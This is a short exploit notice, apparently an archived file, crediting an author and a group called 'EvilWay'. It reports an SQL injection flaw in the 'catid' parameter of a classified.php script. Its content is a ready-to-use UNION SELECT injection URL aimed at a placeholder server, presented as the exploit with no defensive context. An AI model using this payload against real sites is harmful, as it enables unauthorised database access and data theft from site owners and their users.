14 lines
339 B
Text
Executable file
14 lines
339 B
Text
Executable file
/*
|
|
|
|
Author : MizoZ [from MA]
|
|
Group : EvilWay, evilway[at]mail[dot]com
|
|
Email : mizozx[at]gmail[dot]com
|
|
|
|
Greetz : Zuka, Dyle !!
|
|
|
|
MABROOK L3IIIIIIIIIID
|
|
|
|
*/
|
|
|
|
The vulnerability is in the $_GET['catid'] , exploit :
|
|
http://server/classified.php?catid=2+and+1=0+union+all+select+1,2,3,4,5,6,7--
|